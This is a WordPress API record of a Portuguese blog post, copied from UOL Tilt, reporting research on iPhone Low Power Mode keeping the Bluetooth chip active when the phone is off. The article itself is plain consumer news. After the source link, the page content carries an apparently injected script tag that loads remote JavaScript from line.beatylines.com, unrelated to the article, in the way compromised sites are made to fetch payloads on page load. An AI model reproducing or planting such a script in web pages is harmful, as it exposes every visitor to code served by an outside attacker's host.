{"id":1097,"date":"1969-12-31T21:00:00","date_gmt":"1970-01-01T00:00:00","guid":{"rendered":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/hackers-podem-acessar-seu-iphone-mesmo-quando-ele-esta-desligado\/"},"modified":"1969-12-31T21:00:00","modified_gmt":"1970-01-01T00:00:00","slug":"hackers-podem-acessar-seu-iphone-mesmo-quando-ele-esta-desligado","status":"publish","type":"post","link":"https:\/\/manualdoidoso.com.br\/blog\/1969\/12\/31\/hackers-podem-acessar-seu-iphone-mesmo-quando-ele-esta-desligado\/","title":{"rendered":"Hackers podem acessar seu iPhone mesmo quando ele est\u00e1 desligado"},"content":{"rendered":"<p> <br \/>\n<\/p>\n<div>\n<p>Pesquisadores alem\u00e3es afirmam ter descoberto uma falha na seguran\u00e7a no iPhone que pode causar danos aos consumidores. Um experimento conseguiu acessar os dados do dispositivo mesmo com o aparelho desligado ou descarregado.<\/p>\n<p>De acordo com a an\u00e1lise, cibercriminosos podem utilizar um <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/09\/10\/phishing-spyware-spam-malware-ou-virus-o-que-sao-as-pragas-da-internet.htm\">malware (software <\/a><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/09\/10\/phishing-spyware-spam-malware-ou-virus-o-que-sao-as-pragas-da-internet.htm\">malicioso)<\/a> para entrar no aparelho. O artigo com as observa\u00e7\u00f5es foi <a href=\"http:\/\/arxiv.org\/pdf\/2205.06114.pdf\">compartilhado em 12 de maior no arXiv<\/a>, reposit\u00f3rio que recebe estudos antes que sejam publicados nas revistas especializadas.<\/p>\n<h2>Como a falha funciona?<\/h2>\n<p>A explora\u00e7\u00e3o, segundo o estudo, se d\u00e1 atrav\u00e9s do LPM (Modo de Baixo Consumo, em portugu\u00eas) do <a href=\"https:\/\/www.uol.com.br\/tilt\/iphone\/\">iPhone<\/a>. Os pesquisadores verificaram que essa fun\u00e7\u00e3o do aparelho n\u00e3o desliga totalmente o dispositivo, o deixando ainda ativo em funcionamento por 24 horas, por 7 dias por semana.<\/p>\n<p>O fato de o <a href=\"https:\/\/www.uol.com.br\/tilt\/smartphone\/\">celular<\/a> nunca desligar por completo abre brechas para que hackers invadam o aparelho e furte as credenciais do usu\u00e1rio \u2014 como senhas, por exemplo, segundo os pesquisadores.<\/p>\n<p>Essa vulnerabilidade no LPM ocorre por meio de um chip <a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/02\/23\/o-que-e-bluetooth-e-por-que-ele-importa-para-o-seu-celular.htm\">Bluetooth<\/a>, que ainda permanece ativo, n\u00e3o criptografado (camada extra de seguran\u00e7a). Para os testes, o estudo usou um iPhone 13 com o sistema operacional iOS 15 instalado.<\/p>\n<p>&#8220;A implementa\u00e7\u00e3o atual do LPM nos iPhones da Apple \u00e9 opaca e adiciona novas amea\u00e7as. Como o suporte ao LPM \u00e9 baseado no hardware do iPhone, ele n\u00e3o pode ser removido com atualiza\u00e7\u00f5es do sistema. Assim, tem um efeito duradouro no modelo geral de seguran\u00e7a do iOS&#8221;, afirmam os pesquisadores.<\/p>\n<p>O estudo ainda critica a Apple por avaliar que a empresa levou em conta apenas &#8220;o design e funcionalidade do hardware&#8221;, sem considerar &#8220;as amea\u00e7as fora dos aplicativos pretendidos&#8221;, pois &#8220;n\u00e3o \u00e9 protegida contra manipula\u00e7\u00e3o&#8221;.<\/p>\n<h2>Devo me preocupar?<\/h2>\n<p>Os resultados da pesquisa foram enviados para engenheiros da Apple. Mas, segundo os autores do artigo, n\u00e3o houve retorno sobre o estudo. A empresa no Brasil informou a <strong>Tilt<\/strong> que &#8220;n\u00e3o tem coment\u00e1rios no momento&#8221; sobre o caso.<\/p>\n<p>Apesar da descoberta, os pesquisadores dizem que uma a\u00e7\u00e3o cibercriminosa do tipo n\u00e3o \u00e9 t\u00e3o f\u00e1cil de executar. Nesse caso, os hackers precisariam primeiro conseguir quebrar o &#8220;jailbreak&#8221;, que \u00e9 ato de burlar as restri\u00e7\u00f5es de seguran\u00e7a do iPhone.<\/p>\n<p>Contudo, \u00e9 bom ficar de olho em qualquer comportamento suspeito no aparelho ou em aplicativos instalados nele. N\u00e3o se deve duvidar da ast\u00facia dos hackers, alertam dos pesquisadores. &#8220;Os fabricantes est\u00e3o adicionando recursos o tempo todo e com cada novo recurso vem uma nova superf\u00edcie de ataque.&#8221;<\/p>\n<p>Em 2021, por exemplo, jovens conseguiram <a href=\"http:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2021\/10\/19\/hackers-invadem-iphone-13-em-tempo-recorde.htm\">invadir remotamente um iPhone<\/a> em apenas 15 segundos, em uma competi\u00e7\u00e3o de tecnologia.<\/p>\n<\/p><\/div>\n<p><br \/>\n<br \/><a href=\"https:\/\/www.uol.com.br\/tilt\/noticias\/redacao\/2022\/05\/19\/hackear-iphone-desligado-malware.htm\">Source link <\/a><script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pesquisadores alem\u00e3es afirmam ter descoberto uma falha na seguran\u00e7a no iPhone que pode causar danos aos consumidores. Um experimento conseguiu acessar os dados do dispositivo mesmo com o aparelho desligado ou descarregado. De acordo com a an\u00e1lise, cibercriminosos podem utilizar um malware (software malicioso) para entrar no aparelho. O artigo com as observa\u00e7\u00f5es foi compartilhado&#8230;<\/p>\n","protected":false},"author":1,"featured_media":748,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_kad_post_transparent":"","_kad_post_title":"","_kad_post_layout":"","_kad_post_sidebar_id":"","_kad_post_content_style":"","_kad_post_vertical_padding":"","_kad_post_feature":"","_kad_post_feature_position":"","_kad_post_header":false,"_kad_post_footer":false,"footnotes":""},"categories":[1],"tags":[2268,2269,1359,189,1388,322,1104,130,155,909],"class_list":["post-1097","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sem-categoria","tag-acessar","tag-desligado","tag-ele","tag-esta","tag-hackers","tag-iphone","tag-mesmo","tag-podem","tag-quando","tag-seu"],"_links":{"self":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1097","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/comments?post=1097"}],"version-history":[{"count":0,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/posts\/1097\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media\/748"}],"wp:attachment":[{"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/media?parent=1097"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/categories?post=1097"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/manualdoidoso.com.br\/blog\/wp-json\/wp\/v2\/tags?post=1097"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}